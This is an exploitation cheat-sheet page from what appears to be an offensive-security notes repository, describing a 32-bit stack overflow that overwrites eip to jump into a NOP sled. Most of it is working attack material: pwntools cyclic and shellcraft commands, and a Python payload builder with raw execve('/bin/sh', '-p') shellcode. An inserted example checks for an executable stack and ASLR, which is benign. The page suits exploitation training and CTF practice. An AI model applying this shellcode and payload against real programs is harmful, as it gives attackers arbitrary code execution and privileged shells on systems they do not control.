killchain-compendium/Exploits/Binaries/Cut Stack in Half.md


2022-11-13 22:38:01 +01:00
# Cut Stack in Half + NOPsled
* Stack has to be executable
* Payload layout: `cyclic` buffer + `eip` content (`esp` + half of the stack) + NOP sled + shellcode
* **ASLR has to be off**, or the address placed in `eip`, which has to point into the sled, needs to be fuzzed hard
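
Added example, not part of the original note: a check for whether the two preconditions above hold, reading the `PT_GNU_STACK` program header of an ELF file and the kernel's `randomize_va_space` setting. The function names are illustrative and the sample ELF bytes are constructed.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header type that carries the stack permissions
PF_X = 0x1                 # "executable" bit in p_flags

def stack_is_executable(elf: bytes):
    """True/False from PT_GNU_STACK; None if the header is absent (arch default applies)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = elf[4] == 2                       # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if elf[5] == 1 else ">"        # EI_DATA: 1 = little endian
    if is64:
        phoff, = struct.unpack_from(end + "Q", elf, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 54)
        flags_at = 4                         # p_flags follows p_type in Elf64_Phdr
    else:
        phoff, = struct.unpack_from(end + "I", elf, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", elf, 42)
        flags_at = 24                        # p_flags is the 7th word in Elf32_Phdr
    for i in range(phnum):
        base = phoff + i * phentsize
        p_type, = struct.unpack_from(end + "I", elf, base)
        if p_type == PT_GNU_STACK:
            p_flags, = struct.unpack_from(end + "I", elf, base + flags_at)
            return bool(p_flags & PF_X)
    return None

def aslr_level(path="/proc/sys/kernel/randomize_va_space"):
    """0 = off, 1 = stack/mmap/vDSO randomised, 2 = also brk; None if unreadable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

def sample_elf32(p_flags):
    """Constructed 32-bit little-endian ELF: header plus one PT_GNU_STACK entry."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, p_flags, 16)
    return ehdr + phdr

if __name__ == "__main__":
    print("RW stack :", stack_is_executable(sample_elf32(0x6)))
    print("RWX stack:", stack_is_executable(sample_elf32(0x7)))
    print("ASLR     :", aslr_level())
```
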
## shellcraft
* for example
```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```
## Usage
* Measure the `eip` offset by sending a cyclic pattern generated via
```sh
cyclic <number>
```
* Check the `eip` content in gdb, then look up its offset via
```sh
cyclic -l <eipContent>
```
* Example code
```python
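from pwn import *

# Placeholders: replace with the values observed in gdb
eip_content = 0x61616174  # placeholder for <eipContent>
esp = 0xffffd000          # placeholder for <esp>
offset = 0x40             # placeholder: some offset into the stack
padding = cyclic(cyclic_find(eip_content))  # filler up to the saved return address
eip = p32(esp + offset)                     # little-endian address pointing into the sled
sled = b"\x90" * 100                        # 100 NOP bytes (0x90)
shellcode = b"jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode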
```